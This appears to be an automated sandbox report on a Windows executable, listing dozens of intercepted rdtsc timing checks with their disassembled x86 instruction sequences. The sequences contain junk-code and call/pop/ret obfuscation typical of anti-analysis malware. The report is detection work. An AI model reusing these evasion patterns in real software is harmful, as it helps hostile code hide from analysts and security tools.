                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5EE1 second address: 8F5F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 ja 00007F98219BDB66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F98219BDB68h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push eax 0x0000002c pushad 0x0000002d jmp 00007F98219BDB70h 0x00000032 pushad 0x00000033 jbe 00007F98219BDB66h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6217 second address: 8F621D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F621D second address: 8F6222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6222 second address: 8F6227 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6227 second address: 8F625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F98219BDB78h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F98219BDB6Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F62F4 second address: 8F631C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F9820CD6BB8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F9820CD6B96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63FE second address: 8F6408 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6408 second address: 8F6412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9820CD6B96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F647C second address: 8F6495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F98219BDB6Bh 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7432 second address: 8F744A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6BA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F72B2 second address: 8F72BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F744A second address: 8F746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9820CD6BA4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F72BD second address: 8F72CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F72CA second address: 8F72E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F852A second address: 8F852F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F852F second address: 8F8564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9820CD6B9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop eax 0x00000016 nop 0x00000017 mov esi, 4657953Ah 0x0000001c push 00000000h 0x0000001e sbb di, 1260h 0x00000023 push 00000000h 0x00000025 clc 0x00000026 push eax 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FBDF8 second address: 8FBE0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEDA5 second address: 8FEDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEDA9 second address: 8FEDAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEDAD second address: 8FEE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jl 00007F9820CD6B96h 0x00000012 popad 0x00000013 pop ecx 0x00000014 nop 0x00000015 jl 00007F9820CD6B9Ch 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F9820CD6B98h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 add bx, C264h 0x0000003c push 00000000h 0x0000003e jl 00007F9820CD6B9Ch 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 pushad 0x00000047 jmp 00007F9820CD6BA6h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FAF4D second address: 8FAF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FAF51 second address: 8FAF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900E69 second address: 900ECE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F98219BDB68h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F98219BDB68h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f movsx edi, cx 0x00000042 clc 0x00000043 push 00000000h 0x00000045 mov dword ptr [ebp+1245B2D7h], esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900ECE second address: 900EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901ECE second address: 901ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901ED3 second address: 901ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901ED9 second address: 901EEC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901EEC second address: 901F8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9820CD6B9Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F9820CD6B98h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F9820CD6BA1h 0x0000002b mov di, cx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F9820CD6B98h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov bx, 3E71h 0x0000004e mov edi, 0A50E832h 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D35C0h], edi 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d push ecx 0x0000005e ja 00007F9820CD6B96h 0x00000064 pop ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F9820CD6BA7h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901F8B second address: 901F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901F8F second address: 901FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9820CD6B9Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 902F02 second address: 902F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a js 00007F98219BDB66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEF2D second address: 8FEF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9820CD6BA5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEF4B second address: 8FEF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F98219BDB66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9076C2 second address: 9076D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9076D5 second address: 90770A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB77h 0x00000009 popad 0x0000000a jg 00007F98219BDB79h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90770A second address: 907723 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9820CD6BA4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 907723 second address: 90773E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jl 00007F98219BDB66h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90773E second address: 907743 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C21 second address: 8B6C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F98219BDB66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C2F second address: 8B6C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C4D second address: 8B6C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F98219BDB6Ch 0x0000000b jnl 00007F98219BDB66h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C61 second address: 8B6CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA7h 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F9820CD6BA5h 0x00000012 jmp 00007F9820CD6BA9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6CB0 second address: 8B6CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F98219BDB66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6CBF second address: 8B6CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6CC3 second address: 8B6CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90104D second address: 901053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901053 second address: 901057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D2D second address: 909D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D33 second address: 909D4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F98219BDB66h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F98219BDB89h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D4A second address: 909D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D4E second address: 909DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub bl, 00000079h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 jng 00007F98219BDB79h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 sub dword ptr [ebp+12462B41h], ebx 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F98219BDB76h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909DAF second address: 909DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AE1A second address: 90AE20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CCC8 second address: 90CCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CCCE second address: 90CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CCD3 second address: 90CCF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9820CD6BA7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CEEA second address: 90CEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CEEE second address: 90CEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9820CD6B96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90FE4B second address: 90FE54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910426 second address: 9104A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F9820CD6B98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 cld 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F9820CD6B98h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov bh, ACh 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 jmp 00007F9820CD6B9Ch 0x0000004c jmp 00007F9820CD6B9Ch 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jg 00007F9820CD6B96h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9104A4 second address: 9104BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DF74 second address: 90DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9106A0 second address: 9106B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91159F second address: 9115AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9115AD second address: 9115B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9125FB second address: 91260B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91260B second address: 912610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A5AB second address: 91A5C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9820CD6B96h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jc 00007F9820CD6B96h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A894 second address: 91A8A1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922205 second address: 922257 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9820CD6B9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9820CD6BA4h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F9820CD6B9Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push esi 0x0000001c jmp 00007F9820CD6B9Dh 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922257 second address: 922272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB76h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92251E second address: 922538 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9820CD6B98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F9820CD6B98h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922538 second address: 92253E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92253E second address: 922542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922542 second address: 922552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922552 second address: 922556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922556 second address: 92255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278D4 second address: 9278E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9278E0 second address: 9278E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9266C6 second address: 9266CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C22 second address: 926C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C26 second address: 926C2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C2B second address: 926C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F98219BDB6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
